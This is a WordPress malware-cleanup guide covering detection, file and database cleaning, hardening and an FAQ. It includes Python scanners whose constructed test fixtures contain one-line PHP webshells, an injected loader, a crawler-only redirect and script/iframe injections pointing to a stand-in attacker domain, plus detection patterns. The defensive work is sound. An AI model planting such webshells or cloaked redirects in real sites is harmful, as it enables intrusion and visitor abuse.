Written by Aegis Webs — WordPress security, malware recovery, and performance optimization.
WordPress Malware Removal Overview
WordPress malware refers to malicious code that has been inserted into your website without your permission or knowledge.
Once malware infects a WordPress website, it can manipulate how the site behaves, expose sensitive data, and damage the website’s search reputation. If not handled properly, the infection may also allow attackers to regain access even after partial cleanup.
Common consequences of WordPress malware include:
- Redirecting visitors to harmful or scam websites
- Injecting spam links into your existing content
- Creating hidden administrator or access accounts
- Corrupting or replacing XML sitemap files
- Generating fake backlinks to unknown domains
- Increasing server load through hidden scripts
- Exposing API credentials or authentication tokens
- Getting the website flagged or blacklisted by Google
This guide explains practical, real-world steps used to detect, remove, and prevent malware infections on WordPress websites.
What Is WordPress Malware?
WordPress malware is harmful code that attackers insert into website files or the database in order to exploit the site.
Malware usually enters a website through vulnerable plugins, outdated themes, weak passwords, compromised hosting environments, or infected administrator devices.
Once installed, the malicious code can perform various actions such as:
- Redirecting visitors to spam or phishing websites
- Injecting hidden spam links into existing pages
- Stealing user or customer data
- Creating hidden administrator users
- Generating unauthorized API tokens
- Creating unknown FTP accounts on the server
- Adding unauthorized users to your Google Search Console account
- Changing or corrupting XML sitemap files
- Generating backlinks to unknown or malicious domains (often visible inside Google Search Console)
- Modifying important website files without the site owner’s knowledge
- Sending spam emails through the hosting server
- Creating sudden spikes of fake or bot traffic
- Slowing down the website significantly
- Triggering Google security warnings or blacklisting
If any of these activities appear on your website, it should be treated as a potential compromise.
Signs Your Website Is Infected or Hacked
Malware infections do not always produce obvious symptoms. Some operate silently while others cause visible changes to the website.
Common warning signs include:
- Unknown administrator users appearing inside WordPress
- Unauthorized FTP accounts appearing in the hosting panel
- New API tokens that you did not create
- Unknown users added to your Google Search Console access list
- Corrupted, replaced, or missing sitemap files
- Sudden appearance of spam backlinks in SEO tools or Search Console
- Pages redirecting visitors to malicious domains
- Suspicious PHP files appearing anywhere on the server
- Unexpected PHP files inside /wp-content/uploads/
- New folders appearing in the root directory without explanation
- Files or directories inside wp-admin or wp-includes that are not present in a fresh copy of the same WordPress version (wp-admin/maint/ itself is a legitimate core directory that holds repair.php, so compare contents rather than judging by folder name)
- Repeated automated login attempts targeting login or admin URLs
- Backdoor PHP files reappearing even after deletion
If even one of these symptoms appears, the website should be treated as compromised and investigated immediately.
What To Do Immediately (Before Cleaning)
If you suspect malware, do not start deleting files immediately. The first step is to determine what level of access you still have to your website and server.
Understanding your available access will determine how the cleanup process should proceed.
Step 1: Check Your Access
Confirm whether you can still access the following systems:
- WordPress dashboard (wp-admin)
- Your hosting control panel such as cPanel, Plesk, or DirectAdmin
- File Manager inside the hosting panel
- FTP access to the server
- phpMyAdmin for database access
The cleanup method depends on which systems remain accessible.
If wp-admin is locked but the hosting panel is still accessible, manual cleanup is still possible.
If the hosting panel is also inaccessible, you should contact your hosting provider immediately to regain account access.
Step 2: Create a Complete Backup
Before deleting or modifying any files, create a complete backup of the website. Even if the website is infected, a backup allows you to restore files if something important is accidentally removed during cleanup.
If you can still access the WordPress dashboard:
Install a backup plugin such as:
Create the following backups:
- Full website files backup
- Complete WordPress database backup
After creating the backup, download the backup files to your local computer.
If the WordPress dashboard is not accessible:
Create a backup directly from the hosting control panel.
- Download the entire root directory (usually public_html)
- Export the full database using phpMyAdmin
- Download the .htaccess file
- Download the wp-config.php file
Check Server-Level Backups
Many hosting providers maintain automated server backups that may allow you to restore the website to an earlier state.
Common backup systems include:
- JetBackup
- Backuply (server-side installations)
- Automatic restore points provided by the hosting provider
If a clean restore point exists from before the infection occurred, restoring the backup may be faster than performing a full manual cleanup.
However, confirm that the backup was created before the infection. Restoring an already infected backup will not solve the problem.
Do not skip the backup step.
Step 1 – Scan the Website for Malware
Use a Hosting-Level Scanner First
Server-level malware scanners inspect files across the entire hosting account, including areas outside the WordPress installation.
Common server scanning tools include:
- ImunifyAV / Imunify360
- ClamAV
- Linux Malware Detect (Maldet)
- ConfigServer eXploit Scanner (CXS)
Typical scanning process:
- Open your hosting control panel
- Navigate to Security or Malware Scanner
- Run a full account scan
- Record the file paths flagged by the scanner
Avoid deleting files immediately. First document the scan results so you know exactly which files were flagged.
Scan Using a WordPress Security Plugin (If wp-admin Is Accessible)
If you still have access to the WordPress dashboard, you can run an additional scan using a security plugin.
Use only one scanner at a time to avoid unnecessary server load.
Common scanning plugins include:
- Wordfence (use primarily for scanning; it can be heavy on shared hosting)
- Sucuri Security
- MalCare
Important notes about MalCare:
- The free version mainly detects malware
- It does not remove infections
- Detailed infected file paths may not always be displayed
Because of this, it is generally used as a detection tool unless the premium version is available.
Manual File Inspection
Automated scanners do not always detect every infection. Manual inspection of key directories is often necessary.
Check the following locations:
- /wp-content/uploads/ (this folder should normally not contain executable PHP files)
- The root directory for unknown or suspicious folders
- The wp-admin and wp-includes directories for files or subfolders that are not in a fresh copy of the same WordPress version (wp-admin/maint/ is a legitimate core directory, so judge by contents, not by name)
- Recently modified files (sort by modification time in the file manager, or ask your host for a list of files changed in the last few days)
- The .htaccess file
- The wp-config.php file
Look for suspicious code patterns such as:
- eval()
- base64_decode()
- gzinflate()
- Obfuscated or unreadable code
- Long encoded strings
Some legitimate plugins use base64_decode() and similar functions, so a match is a lead to review rather than proof of infection; the combination of an unexpected location, a recent modification time and obfuscated code is what matters.
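The manual checks above can be scripted so that the same three questions (PHP under uploads, obfuscation patterns, recent changes) are answered for a whole document root at once. The following is an added example, not code from the original page or from Aegis Webs; it runs the checks over a small constructed sample tree, and the file names, the sample webshell, the 7-day window and the 200-character threshold for "long encoded string" are assumptions for illustration. Pointing triage() at a real document root only reads files, so it is safe to run on a live site.

```python
"""Manual-inspection checks from the guide, scripted: PHP under uploads,
obfuscation patterns, and recently modified files.

Added example, not code from the original page. The sample tree built by
build_sample_site() is constructed for illustration."""
import os
import re
import tempfile
import time

PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".phar")

# Calls that injected code leans on. Legitimate plugins use some of them
# too (base64_decode especially), so a hit is a lead to review, not proof.
SUSPICIOUS = re.compile(
    r"\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|gzuncompress\s*\(|"
    r"str_rot13\s*\(|preg_replace\s*\(\s*['\"][^'\"]*/e['\"]",
    re.IGNORECASE,
)
LONG_ENCODED = re.compile(r"[A-Za-z0-9+/=]{200,}")  # long base64-looking blob


def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")


def php_in_uploads(root):
    """PHP files anywhere under wp-content/uploads; a clean site has none."""
    uploads = os.path.join(root, "wp-content", "uploads")
    hits = []
    for dirpath, _, files in os.walk(uploads):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                hits.append(_rel(os.path.join(dirpath, name), root))
    return sorted(hits)


def suspicious_code(root):
    """Relative path -> matched snippets, for PHP files that hit a pattern."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            matches = [m.group(0) for m in SUSPICIOUS.finditer(text)]
            if LONG_ENCODED.search(text):
                matches.append("<long encoded string>")
            if matches:
                findings[_rel(path, root)] = matches
    return findings


def recently_modified(root, days=7, now=None):
    """Files changed within the last `days` days, newest first."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    out = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mtime = os.stat(path).st_mtime
            if mtime >= cutoff:
                out.append((_rel(path, root), mtime))
    out.sort(key=lambda t: t[1], reverse=True)
    return [p for p, _ in out]


def triage(root, days=7):
    return {
        "php_in_uploads": php_in_uploads(root),
        "suspicious": suspicious_code(root),
        "recent": recently_modified(root, days),
    }


# the two files the constructed fixture plants; everything else is aged 30 days
INJECTED = ("wp-content/uploads/2024/01/wp-cache.php",
            "wp-content/themes/demo/functions.php")


def build_sample_site():
    """Constructed fixture: a tiny WordPress-like tree with old clean files,
    a webshell dropped into uploads, and an obfuscated theme file."""
    root = tempfile.mkdtemp(prefix="wpsample_")
    files = {
        "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-content/uploads/2024/01/image.jpg": "not really a jpeg\n",
        # webshell: runs whatever arrives in POST parameter c
        INJECTED[0]: "<?php eval(base64_decode($_POST['c'])); ?>\n",
        # loader hidden behind a long base64 blob
        INJECTED[1]: "<?php\n$x = '" + "QUFB" * 60 + "';\neval(gzinflate(base64_decode($x)));\n",
    }
    old = time.time() - 30 * 86400
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        if rel not in INJECTED:
            os.utime(path, (old, old))
    return root


if __name__ == "__main__":
    for key, val in triage(build_sample_site()).items():
        print(key, val)
```

On the sample tree the uploads check returns only the planted wp-cache.php, the pattern scan flags both planted files and leaves index.php alone, and the recent-changes list contains exactly the two planted files, which is the triangulation a manual review is aiming for.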
Step 2 – Remove Malicious Files Safely
Remove Backdoor Files
- Delete unknown PHP files that do not belong to WordPress
- Remove randomly named alphanumeric files
- Delete suspicious or fake plugin folders
- Remove newly created directories that you did not create
If you are unsure whether a file is legitimate, compare your installation with a clean WordPress installation.
Replace WordPress Core Files
Download a fresh copy of WordPress from the official website: wordpress.org
Extract the package locally.
Upload and replace the following directories and files:
- /wp-admin/
- /wp-includes/
- WordPress core files in the root directory (index.php, wp-load.php, wp-settings.php, wp-login.php, xmlrpc.php and the other wp-*.php files)
Delete the existing wp-admin and wp-includes directories before uploading the fresh copies. Overwriting replaces the files that exist in the release but leaves behind anything an attacker added alongside them. Use the same WordPress version the site is running, or the current release if you intend to upgrade at the same time.
Do not overwrite:
- /wp-content/
- wp-config.php
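Replacing core is only verifiable if you can compare what is on disk with what the release shipped. WordPress publishes per-file MD5 checksums for every release at https://api.wordpress.org/core/checksums/1.0/?version=VERSION&locale=en_US (JSON with a "checksums" map of relative path to MD5), and WP-CLI's wp core verify-checksums uses that list. The following is an added example, not code from the original page or from Aegis Webs, of the same comparison written out: it reports core files whose hash differs, files missing from the install, and files under wp-admin or wp-includes that the release never contained, which is where dropped backdoors show up. The three-file "release" and the tampered install are constructed; on a real site you would feed verify_core() the checksum map downloaded from the URL above.

```python
"""Verify WordPress core against a known-good checksum list and report
modified, missing and extra files.

Added example, not code from the original page. On a real site the expected
hashes come from the wordpress.org checksums API for the installed version;
here build_fixture() constructs a fake release and a tampered install."""
import hashlib
import os
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")  # wp-content is not core and is not checked here


def md5_file(path):
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_core(root, expected):
    """expected maps relative path -> md5 of the pristine file.
    'extra' lists files under wp-admin/ or wp-includes/ absent from the list;
    plain overwriting with a fresh download never removes those."""
    modified, missing, extra = [], [], []
    for rel, digest in expected.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            missing.append(rel)
        elif md5_file(path) != digest:
            modified.append(rel)
    for core_dir in CORE_DIRS:
        for dirpath, _, files in os.walk(os.path.join(root, core_dir)):
            for name in files:
                rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
                if rel not in expected:
                    extra.append(rel)
    return {"modified": sorted(modified), "missing": sorted(missing), "extra": sorted(extra)}


def build_fixture():
    """Constructed: three 'release' files give the expected hashes; the installed
    copy has one core file with an injected loader and one file dropped into
    wp-admin/maint/, a directory that legitimately exists in core."""
    release = {
        "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-includes/version.php": "<?php\n$wp_version = '6.x';\n",
        "wp-admin/maint/repair.php": "<?php\n// database repair screen\n",
    }
    expected = {rel: hashlib.md5(body.encode("utf-8")).hexdigest() for rel, body in release.items()}
    installed = dict(release)
    installed["wp-includes/version.php"] += "@include '/tmp/.cache/.x';\n"   # injected loader
    installed["wp-admin/maint/cache.php"] = "<?php @eval($_REQUEST['q']);\n"  # dropped backdoor
    root = tempfile.mkdtemp(prefix="wpcore_")
    for rel, body in installed.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root, expected


if __name__ == "__main__":
    root, expected = build_fixture()
    print(verify_core(root, expected))
```

The checksum list covers core only; plugins and themes have no official equivalent in that API, although WP-CLI's wp plugin verify-checksums checks plugins hosted on wordpress.org the same way. For anything else, compare against a pristine copy of the same version by hand.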
Inspect wp-config.php Carefully
Open the wp-config.php file in your website root directory. This file contains critical configuration settings for WordPress, including database credentials and security keys.
Scroll to the bottom of the file. In a normal installation, the final lines should look like this:
/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
Anything added after this line should be treated as suspicious and reviewed carefully.
Common indicators of malicious code include:
- Any code placed after the require_once line
- Functions such as eval()
- Encoded strings using base64_decode()
- Unknown include or require statements
- External domain calls that do not belong to WordPress
If you are unsure whether the file has been modified, compare it with the wp-config-sample.php file included in a clean WordPress installation.
Remove only the malicious or suspicious code. Do not remove database credentials, authentication keys, or other legitimate configuration settings.
Inspect .htaccess Carefully
The .htaccess file controls important server behavior such as URL rewriting and access rules. Malware often modifies this file to redirect visitors or hide malicious activity.
A normal WordPress .htaccess block typically looks like this:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
Warning signs inside the file include:
- Long encoded or obfuscated strings
- Redirect rules pointing to unknown domains
- Conditional redirects targeting search engines or bots
If you are unsure whether the file has been compromised:
- Create a backup copy of the current file
- Replace it with the default WordPress rewrite block
- Log in to the WordPress dashboard and save permalinks to regenerate rewrite rules
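The wp-config.php and .htaccess reviews above both come down to a handful of mechanical checks: is there anything after the wp-settings.php require line, are there eval()/base64_decode() calls or includes of files that are not wp-settings.php, and does .htaccess redirect to a host that is not yours, key a rewrite on a crawler's User-Agent, map the PHP handler onto non-PHP extensions, or set auto_prepend_file. The following is an added example, not code from the original page or from Aegis Webs, that performs those checks on constructed samples of both files; the domain bad-example.invalid, the example paths and the list of crawler names are assumptions for illustration. Pass check_htaccess() the hostnames your site legitimately redirects to so that your own www/non-www redirect is not reported.

```python
"""Checks for the two files malware most often edits: wp-config.php and
.htaccess.

Added example, not code from the original page. CLEAN_WP_CONFIG,
INFECTED_WP_CONFIG and the .htaccess samples are constructed; the host
bad-example.invalid stands in for an attacker-controlled domain."""
import re

WP_SETTINGS_REQUIRE = re.compile(r"require_once\s+ABSPATH\s*\.\s*'wp-settings\.php'\s*;")
CODE_SMELLS = re.compile(r"\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(")
INCLUDE_STMT = re.compile(r"\b(?:include|require)(?:_once)?\b([^;]*);")


def check_wp_config(text):
    findings = []
    m = WP_SETTINGS_REQUIRE.search(text)
    if m is None:
        findings.append("wp-settings.php require line not found")
        tail = ""
    else:
        tail = text[m.end():]
    # anything beyond whitespace or a closing tag after the require line was added later
    if re.sub(r"\s|\?>", "", tail):
        findings.append("code after wp-settings.php require: " + tail.strip().splitlines()[0][:80])
    findings += ["suspicious call: " + hit.group(0) for hit in CODE_SMELLS.finditer(text)]
    for hit in INCLUDE_STMT.finditer(text):
        target = hit.group(1).strip()
        if "wp-settings.php" not in target:   # the only include a stock wp-config.php has
            findings.append("foreign include: " + target[:80])
    return findings


def check_htaccess(text, own_hosts):
    """own_hosts: lowercase hostnames the site legitimately redirects to."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if re.match(r"(?:RewriteRule|Redirect)", s, re.I):
            for host in re.findall(r"https?://([^/\s\"']+)", s):
                if host.lower() not in own_hosts:
                    findings.append(f"line {n}: redirect to external host {host}")
        # conditions keyed on crawler user agent or referrer: the classic cloaked redirect
        if re.match(r"RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}", s, re.I) and \
                re.search(r"google|bing|yahoo|yandex|bot|crawl|facebook", s, re.I):
            findings.append(f"line {n}: rewrite condition keyed on crawler UA/referrer")
        # PHP handler attached to non-PHP extensions lets an uploaded .jpg run as code
        m = re.match(r"AddHandler\s+\S*php\S*\s+(.+)", s, re.I)
        if m:
            exts = [e for e in m.group(1).split() if not e.lower().startswith((".php", ".phtml"))]
            if exts:
                findings.append(f"line {n}: PHP handler mapped to {' '.join(exts)}")
        if re.search(r"php_value\s+auto_(?:prepend|append)_file", s, re.I):
            findings.append(f"line {n}: auto_prepend/auto_append_file set")
        if re.search(r"[A-Za-z0-9+/=]{120,}", s):
            findings.append(f"line {n}: long encoded string")
    return findings


CLEAN_WP_CONFIG = """<?php
define('DB_NAME', 'example_db');
define('DB_USER', 'example_user');
define('DB_PASSWORD', 'example-pass');
$table_prefix = 'wp_';
/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
"""

# constructed injection: a loader appended after the require line
INFECTED_WP_CONFIG = CLEAN_WP_CONFIG + """@include_once '/home/example/.cache/.sess.php';
eval(base64_decode('ZWNobyAnaGknOw=='));
"""

CLEAN_HTACCESS = """# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

# constructed injection: crawler-only redirect, .jpg executed as PHP, global prepend
INFECTED_HTACCESS = CLEAN_HTACCESS + """RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://bad-example.invalid/$1 [R=302,L]
AddHandler application/x-httpd-php .jpg
php_value auto_prepend_file /home/example/.cache/.sess.php
"""

if __name__ == "__main__":
    for f in check_wp_config(INFECTED_WP_CONFIG) + check_htaccess(INFECTED_HTACCESS, {"example.com"}):
        print(f)
```

The AddHandler check deliberately ignores handlers mapped onto .php and .phtml, because control panels such as cPanel write an AddHandler line of that form when you choose a PHP version; the dangerous variant is the one that attaches the PHP handler to image or text extensions.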
Step 3 – Clean Malware from the Database
Check the wp_users and wp_usermeta Tables
Open the database using phpMyAdmin and review the wp_users table. The role is not stored there: it lives in wp_usermeta under the meta_key wp_capabilities (the wp_ part follows your table prefix), so filter wp_usermeta for a meta_value containing administrator and compare the matching user IDs with the people who should have admin rights. Checking wp_users alone misses an existing low-privilege account that has been promoted.
Remove any administrator accounts that you did not create, together with their wp_usermeta rows. Attackers often add hidden admin users to regain access after a partial cleanup.
Inspect the wp_options Table
Next, examine the wp_options table for suspicious entries.
Look for:
- Unfamiliar URLs or injected script tags in any option_value (widgets and theme settings are stored here)
- Modified siteurl or home values
- Entries in active_plugins that do not match a folder in wp-content/plugins or that you do not recognise
- Unknown hooks in the cron option, which holds WP-Cron's scheduled events as a serialized array (WP-CLI's wp cron event list shows the same data readably)
Search the Entire Database
Many infections hide spam scripts or redirect code inside posts, widgets, or theme settings stored in the database.
Use the search function in phpMyAdmin to look for suspicious patterns such as:
- <script>
- iframe
- base64
- eval(
Also search for unknown or suspicious domains that do not belong to your website.
If injected code is found, remove it carefully while preserving legitimate content.
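The three database checks above (administrator accounts, wp_options, and a pattern search across content) are a few queries each. The following is an added example, not code from the original page or from Aegis Webs, that runs them against an in-memory SQLite copy of the four relevant tables with constructed rows: one legitimate administrator, one planted administrator, an injected widget option and an injected page. The SQL is plain enough to paste into phpMyAdmin against MySQL or MariaDB after changing the wp_ prefix; the account names, the domain bad-example.invalid and the extra JavaScript patterns are assumptions for illustration.

```python
"""Database triage from the guide, run against a throwaway in-memory SQLite
copy of the four tables that matter.

Added example, not code from the original page. Rows are constructed. The
role lives in wp_usermeta under <prefix>capabilities, not in wp_users."""
import sqlite3

# strings the guide says to search for, plus a few JavaScript tells
PATTERNS = ("<script", "<iframe", "base64", "eval(", "fromCharCode", "document.write")

ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC
"""


def list_administrators(db):
    """Every account with the administrator role, newest registration first."""
    return [tuple(r) for r in db.execute(ADMIN_QUERY)]


def unknown_administrators(db, known_logins):
    return [row[1] for row in list_administrators(db) if row[1] not in known_logins]


def search_injections(db, patterns=PATTERNS):
    """(table, post ID or option_name, pattern) for every row containing a pattern."""
    hits = set()
    for p in patterns:
        like = "%" + p + "%"
        for row in db.execute("SELECT ID FROM wp_posts WHERE post_content LIKE ?", (like,)):
            hits.add(("wp_posts", row[0], p))
        for row in db.execute("SELECT option_name FROM wp_options WHERE option_value LIKE ?", (like,)):
            hits.add(("wp_options", row[0], p))
    return sorted(hits, key=str)


def site_urls(db):
    """siteurl/home: a changed value here redirects or breaks the whole site."""
    return dict(db.execute(
        "SELECT option_name, option_value FROM wp_options WHERE option_name IN ('siteurl', 'home')"))


def open_sample_db():
    """Constructed fixture with one planted admin and two injected rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT, autoload TEXT);
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT, post_type TEXT);
    """)
    db.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", [
        (1, "owner", "owner@example.com", "2021-03-01 10:00:00"),
        (2, "editor", "editor@example.com", "2022-06-10 09:30:00"),
        (3, "wp_support", "support@bad-example.invalid", "2024-05-02 03:14:07"),  # planted account
    ])
    db.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    db.executemany("INSERT INTO wp_options VALUES (?,?,?,?)", [
        (1, "siteurl", "https://example.com", "yes"),
        (2, "home", "https://example.com", "yes"),
        (3, "active_plugins", 'a:1:{i:0;s:27:"demo-plugin/demo-plugin.php";}', "yes"),
        # injected widget: remote script loaded on every page
        (4, "widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:49:"<script src=\"https://bad-example.invalid/x.js\"></script>";}}', "yes"),
    ])
    db.executemany("INSERT INTO wp_posts VALUES (?,?,?,?)", [
        (10, "Hello", "<p>Welcome to the site.</p>", "post"),
        # injected hidden iframe inside an otherwise legitimate page
        (11, "Pricing", '<p>Plans</p><iframe src="https://bad-example.invalid/f" style="display:none"></iframe>', "page"),
    ])
    return db


if __name__ == "__main__":
    db = open_sample_db()
    print(list_administrators(db))
    print(unknown_administrators(db, {"owner"}))
    print(search_injections(db))
    print(site_urls(db))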
Verify and Restore XML Sitemaps
Malware sometimes corrupts sitemap files or replaces them with spam URLs.
Most SEO plugins serve the sitemap dynamically through a rewrite rather than as a file on disk, so a physical sitemap.xml or sitemap_index.xml in the web root that you did not create is suspicious in itself and will shadow the plugin's version. Delete any suspicious or corrupted sitemap files located in the website root directory.
Then regenerate the sitemap using a trusted SEO plugin such as:
After regenerating the sitemap, resubmit it inside Google Search Console and remove any unauthorized users that may have been added.
Protect or Disable XML-RPC
Visit:
yourdomain.com/xmlrpc.php
A reply of "XML-RPC server accepts POST requests only." means the endpoint is live. If nothing on the site needs it (Jetpack and the WordPress mobile apps do), block it using .htaccess:
<Files xmlrpc.php>
Require all denied
</Files>
On Apache 2.2, or 2.4 with mod_access_compat loaded, use order deny,allow followed by deny from all inside the block instead. Servers that ignore .htaccess (Nginx) need the equivalent rule in their own configuration.
Disable File Editing in Dashboard
Open wp-config.php and add the following line above the /* That's all, stop editing! Happy publishing. */ comment:
define('DISALLOW_FILE_EDIT', true);
This removes the theme and plugin file editors from the dashboard, so a stolen administrator session can no longer be used to write PHP through the browser.
Restrict PHP Execution in Uploads
Navigate to:
public_html/wp-content/uploads/
Create or edit a .htaccess file inside the uploads folder and add:
<FilesMatch "\.(php|phtml|php[0-9])$">
Require all denied
</FilesMatch>
On Apache 2.2, or 2.4 with mod_access_compat loaded, use deny from all inside the block instead of Require all denied. This only takes effect where .htaccess is honoured (Apache and LiteSpeed); on Nginx the equivalent rule has to go into the server configuration. The rule stops execution but does not remove files already dropped there, so still delete any PHP found in uploads.
How to Prevent Future WordPress Malware Infections
After cleaning a compromised website, the next priority is preventing the infection from happening again. Most WordPress malware incidents occur because of outdated software, weak access control, or vulnerable plugins.
The following security practices significantly reduce the risk of future compromises.
- Keep WordPress core updated: always run the latest stable version of WordPress. Security patches are released regularly to fix vulnerabilities discovered in the platform.
- Keep plugins and themes updated: outdated plugins and themes are one of the most common entry points for attackers. Remove unused plugins and update active ones regularly.
- Avoid cracked plugins and unknown GPL sources: plugins downloaded from unofficial or untrusted GPL websites often contain hidden backdoors or injected malware.
- Limit administrator access: only trusted users should have administrator privileges. Remove unused accounts and reduce permissions where possible.
- Enable Two-Factor Authentication (2FA): two-factor authentication adds an extra security layer to the WordPress login and significantly reduces the risk of brute-force attacks.
- Protect or disable XML-RPC: if your website does not require XML-RPC functionality, block access to xmlrpc.php to reduce automated login attacks.
- Rotate API keys and tokens after a compromise: if the malware infection exposed API credentials, regenerate and replace them immediately.
- Monitor server and access logs: review hosting logs periodically to detect suspicious activity such as repeated login attempts or unusual traffic spikes.
- Maintain regular off-site backups: frequent backups allow quick restoration if the website becomes compromised again.
Frequently Asked Questions (FAQ)
1. How can I tell if my WordPress website has been hacked?
Some infections are obvious, while others remain hidden until you investigate server files or search console reports.
Common warning signs include:
- Unknown administrator users appearing in WordPress
- Suspicious PHP files inside /wp-content/uploads/
- Visitors being redirected to spam or scam domains
- Spam backlinks appearing in Google Search Console
- Unexpected changes to .htaccess or wp-config.php
- Malware alerts from your hosting provider
If any of these symptoms appear without explanation, the website should be treated as potentially compromised.
2. Can WordPress malware be removed without using a plugin?
Yes. Malware can be removed manually by inspecting and cleaning the website files and database.
Manual cleanup usually involves:
- Replacing WordPress core files with a clean installation
- Removing suspicious or unknown PHP files
- Cleaning injected scripts from the database
- Repairing or replacing the .htaccess file
- Inspecting the wp-config.php file for malicious code
Security plugins are helpful for detection, but manual inspection is often necessary for complete removal.
3. Is restoring a backup better than cleaning the site manually?
If you have a confirmed clean backup created before the infection occurred, restoring that backup is often the fastest solution.
However, always verify the following:
- The backup was created before the infection
- All passwords are rotated after restoration
- The vulnerability that allowed the infection is fixed
Restoring an already infected backup will simply reintroduce the malware.
4. Why does malware return after I delete infected files?
Reinfection usually occurs because something was missed during the cleanup process.
Common causes include:
- A hidden backdoor file remaining on the server
- An infected plugin or theme still installed
- Weak passwords that were not changed
- Compromised FTP credentials
- A server-level vulnerability that was not addressed
After cleaning a compromised site, all access credentials should be rotated.
5. Is deleting suspicious PHP files enough to remove malware?
No. Malware rarely exists in a single location.
A proper cleanup process should also include:
- Replacing WordPress core files
- Inspecting the database for injected scripts
- Checking scheduled cron tasks
- Reviewing administrator accounts
- Inspecting the .htaccess configuration
Deleting one infected file without investigating the rest of the system may leave backdoors behind.
6. Should XML-RPC be disabled?
If your website does not rely on mobile apps, remote publishing tools, or external integrations that require XML-RPC, blocking access to xmlrpc.php can reduce the attack surface.
Blocking the file using .htaccess is usually sufficient to prevent automated abuse and brute-force attempts.
7. Does reinstalling WordPress remove malware?
Reinstalling WordPress replaces the core files, which can remove infections located inside the core system.
However, reinstalling WordPress does not:
- Clean infected plugins
- Clean infected themes
- Remove malicious database injections
- Remove backdoor scripts placed in the uploads directory
Core replacement should be treated as only one step in the cleanup process.
8. Does shared hosting increase the risk of malware?
Shared hosting itself is not inherently insecure. However, the risk increases if server security is poorly maintained.
Potential risks include:
- Other compromised accounts on the same server
- Weak file permission configurations
- Outdated PHP versions
- No active server-level malware scanning
Choose hosting providers that maintain updated security layers and server monitoring.
9. After cleaning malware, what should I change immediately?
After removing malware, rotate all credentials that could have been exposed during the compromise.
This includes:
- WordPress administrator passwords
- Hosting control panel passwords
- FTP or SFTP credentials
- Database passwords
- API keys and tokens
- Google Search Console access permissions
Security cleanup is incomplete until access credentials have been updated.
10. How often should WordPress websites be backed up?
At minimum, backups should be created:
- Before installing or updating plugins and themes
- Before major website changes
Recommended backup frequency:
- Daily backups for active websites
- Weekly backups for low-traffic or static websites
Backups should always be stored off-server to ensure they remain available if the hosting account is compromised.